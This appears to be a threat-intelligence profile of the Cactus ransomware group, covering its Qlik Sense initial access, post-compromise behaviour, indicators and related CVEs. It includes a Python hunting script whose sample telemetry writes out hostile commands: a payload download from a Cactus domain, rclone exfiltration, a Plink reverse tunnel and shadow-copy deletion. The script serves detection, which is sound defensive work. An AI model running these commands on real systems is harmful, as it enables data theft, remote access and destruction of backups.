CACTUS
Cactus is a ransomware family, and the group operating it, active worldwide since at least March 2023; reporting links multiple attacks to the group from late 2023 onward. It is described as an emerging ransomware operation and has been named as one of the ransomware families used by former Black Basta affiliates after Black Basta's collapse; separate reporting notes the same social-engineering intrusion pattern (email bombing, Microsoft Teams impersonation, and remote control through Microsoft Quick Assist) in both Black Basta and Cactus intrusions. Cactus has gained initial access by exploiting internet-exposed, unpatched Qlik Sense servers. Joint analysis by Fox-IT, Northwave, Responders, and ESET Nederland found that Dutch victims were consistently compromised via outdated Qlik Sense servers, and Project Melissa estimated roughly 5,200 internet-reachable Qlik Sense servers worldwide, more than 3,100 of them vulnerable and 122 likely already exploited by Cactus. Arctic Wolf separately reported a campaign exploiting the Qlik Sense vulnerabilities CVE-2023-41266 and CVE-2023-41265 (together known as ZeroQlik), and possibly CVE-2023-48365 (DoubleQlik), to gain initial access and ultimately deploy Cactus ransomware.
Observed post-compromise behavior in the Qlik Sense intrusions: the Qlik Sense scheduler service (Scheduler.exe) spawning cmd.exe and PowerShell; PowerShell and BITS used to download tooling; deployment of renamed ManageEngine UEMS components, AnyDesk, and PuTTY/Plink; discovery commands with their output redirected into files carrying a .ttf extension; Sophos uninstalled via msiexec; the local Administrator password changed; an RDP tunnel established with Plink over TCP port 443; lateral movement over RDP; WizTree (a disk-usage analyzer) downloaded; and exfiltration with rclone renamed to svchost.exe before ransomware deployment. Reported infrastructure and artifacts from that activity: zohoservice[.]net; 216.107.136[.]46; 144.172.122[.]30; 45.61.147[.]176; C:\Users\Public\svchost.exe (a user-writable location where the genuine svchost.exe never lives, so any process image at that path is suspect on its own); and a Plink sample with SHA-256 828e81aa16b2851561fff6d3127663ea2d1d68571f06cbd732fdf5672086924d.
The malware inhibits recovery by deleting Windows Volume Shadow Copies before encryption, and Splunk analytics explicitly tie Cactus to WMIC- and PowerShell-based shadow-copy deletion, mapped to ATT&CK T1490 (Inhibit System Recovery). Additional detection content associates Cactus with suspicious HTTP user agents from potentially unwanted applications (PUA), suspicious DNS queries to Discord and other abused web services, and anomalous DLLHost, SearchProtocolHost, and Rundll32 executions lacking their normal command-line arguments; these are detection associations shared with other ransomware families rather than Cactus-exclusive traits, so a hit should be treated as a hunt lead, not an attribution. High-confidence targeting beyond the Qlik Sense intrusion set includes Dutch organizations identified through Project Melissa; broader ransomware reporting also places Cactus among active groups affecting multiple sectors globally.
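As an added example (not code from Mallory, Arctic Wolf, or Splunk), the following Python turns the post-compromise chain and the T1490 shadow-copy deletion described above into hunt rules and runs them over constructed, Sysmon-style process-creation records. The ProcEvent field names, the regular expressions, the ATT&CK mappings other than T1490, and every sample command line are assumptions of this example; only the four network indicators are taken from the page (kept defanged in source and refanged at load time so they match raw telemetry).

```python
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass
class ProcEvent:
    """One process-creation record. Field names are an assumption about how a
    SIEM normalises Sysmon Event ID 1 / Security 4688 data."""
    host: str
    parent: str   # parent process image path
    image: str    # created process image path
    cmdline: str  # created process command line


# Network indicators quoted on this page, kept defanged in source.
PAGE_IOCS = ["zohoservice[.]net", "216.107.136[.]46",
             "144.172.122[.]30", "45.61.147[.]176"]


def refang(ioc: str) -> str:
    """'a[.]b' -> 'a.b' so the indicator matches raw telemetry."""
    return ioc.replace("[.]", ".")


IOCS = [refang(i) for i in PAGE_IOCS]


def _base(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return PureWindowsPath(path).name.lower()


# (rule name, ATT&CK mapping, predicate). Regexes are this example's own.
RULES = [
    ("qlik_scheduler_spawns_shell", "T1190 / T1059",
     lambda e: _base(e.parent) == "scheduler.exe"
     and _base(e.image) in {"cmd.exe", "powershell.exe"}),
    ("discovery_output_to_ttf", "T1082 / T1016 (output staged as .ttf)",
     lambda e: bool(re.search(r'>\s*"?[^\s"]+\.ttf\b', e.cmdline, re.I))),
    ("svchost_in_users_public", "T1036.005",
     lambda e: e.image.lower() == r"c:\users\public\svchost.exe"),
    ("plink_tunnel_over_443", "T1572",
     lambda e: bool(re.search(r"-P\s+443\b", e.cmdline)
                    and re.search(r"\s-[RL]\s", e.cmdline))),
    ("shadow_copy_deletion", "T1490",
     lambda e: bool(re.search(
         r"wmic(\.exe)?\s+shadowcopy\s+delete"
         r"|vssadmin(\.exe)?\s+delete\s+shadows"
         r"|win32_shadowcopy.*(remove-wmiobject|\.delete\(\))",
         e.cmdline, re.I))),
    ("known_cactus_infrastructure", "T1105 / T1071",
     lambda e: any(i in e.cmdline for i in IOCS)),
]


def hunt(events):
    """Return one finding per (event, rule) match, in event then rule order."""
    findings = []
    for e in events:
        for name, technique, pred in RULES:
            if pred(e):
                findings.append({"host": e.host, "rule": name,
                                 "technique": technique, "cmdline": e.cmdline})
    return findings


# Constructed sample telemetry (not real logs) modelled on the chain above.
SAMPLE_EVENTS = [
    ProcEvent("qlik01", r"C:\Program Files\Qlik\Sense\Engine\Scheduler.exe",
              r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c powershell -ep bypass -c "Import-Module BitsTransfer;'
              r' Start-BitsTransfer -Source http://zohoservice.net/s.exe'
              r' -Destination C:\Users\Public\svchost.exe"'),
    ProcEvent("qlik01", r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c "whoami /all & ipconfig /all & nltest /dclist:"'
              r' > C:\Users\Public\1.ttf'),
    ProcEvent("qlik01", r"C:\Windows\System32\cmd.exe",
              r"C:\Users\Public\svchost.exe",
              r"C:\Users\Public\svchost.exe copy \\fs01\finance remote:stage"
              r" --config C:\Users\Public\r.conf --transfers 4"),
    ProcEvent("qlik01", r"C:\Windows\System32\cmd.exe",
              r"C:\Users\Public\plink.exe",
              r"plink.exe -P 443 -l u -pw x -R 0.0.0.0:3389:127.0.0.1:3389"
              r" 45.61.147.176"),
    ProcEvent("fs01", r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\wbem\WMIC.exe",
              r"wmic.exe shadowcopy delete /nointeractive"),
    ProcEvent("fs01", r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -c "Get-WmiObject Win32_Shadowcopy |'
              r' ForEach-Object { $_.Delete() }"'),
    # Benign: the genuine svchost.exe from services.exe, and an admin shell.
    ProcEvent("fs01", r"C:\Windows\System32\services.exe",
              r"C:\Windows\System32\svchost.exe", r"svchost.exe -k netsvcs"),
    ProcEvent("ws17", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe Get-Process"),
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f['host']:6} {f['rule']:30} {f['technique']}")
```

Two of the rules are high-fidelity on their own (a process image at C:\Users\Public\svchost.exe, and the Qlik scheduler service spawning a shell); the .ttf redirect, the Plink tunnel, and the shadow-copy deletion are commodity ransomware tradecraft and should be chained with the preceding events on the same host before anyone calls it Cactus.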
Vulnerabilities exploited
7 CVEs correlated with this family across public research and vendor advisories.
For those looking for in-depth coverage of these exploits, the Arctic Wolf blog provides detailed insights into the specific vulnerabilities being exploited, notably CVE-2023-41266, CVE-2023-41265 also known as ZeroQlik, and potentially CVE-2023-48365 also known as DoubleQlik.
Retrieving this file with the ?.ttf extension trick has been fixed in the patch that addresses CVE-2023-48365... Nevertheless, this is still a good way to determine the state of a Qlik instance, because if it redirects using 302 Authenticate at this location it is likely that the server is not vulnerable to CVE-2023-48365.
CVE-2023-27997: Fortinet FortiOS SSL VPN Heap Buffer Overflow RCE - XORtigate (CVSS 9.8)
CVE-2024-21762: Fortinet FortiOS SSL VPN Out-of-Bounds Write RCE (CVSS 9.8)
CVE-2024-40766: SonicWall SonicOS Improper Access Control (CVSS 9.8)
CVE-2025-23006: SonicWall SMA 1000 Pre-Auth Deserialization RCE (CVSS 9.8)
Groups observed using it
3 distinct threat actors attributed by public researchers.
Since November 2023, the Cactus ransomware group has been actively targeting vulnerable Qlik Sense servers.
Following BlackBasta’s shutdown, its former affiliates did not simply disappear. Instead, they regrouped and continued their criminal activities under different ransomware families, including Cactus, and more recently, Payouts King.
...the new Cactus ransomware variant... demonstrates an advanced use of command and scripting techniques...
Techniques & procedures
2 distinct techniques documented for this family, organized by ATT&CK tactic.
Reconnaissance
1 technique: "last quarter featured a dominant voice phishing (vishing) campaign deploying Cactus and Black Basta ransomware that was significantly less present this quarter"
Impact
1 technique: "This analytic detects the use of WMIC to delete volume shadow copies, which is a common technique used by ransomware actors to prevent system recovery."
Recent activity
31 sources tracked across advisories, community write-ups, and news.
Named ransomware family used by former BlackBasta affiliates after BlackBasta disbanded.
A ransomware family mentioned as one of the operations used by former BlackBasta affiliates after BlackBasta’s shutdown.
Ransomware family referenced as having intrusions that used similar email-bombing + Teams impersonation + Quick Assist tradecraft.
Associated Analytic Story (Splunk): Cactus Ransomware; DarkGate Malware; DarkSide Ransomware; Ransomware; Revil Ransomware; VanHelsing Ransomware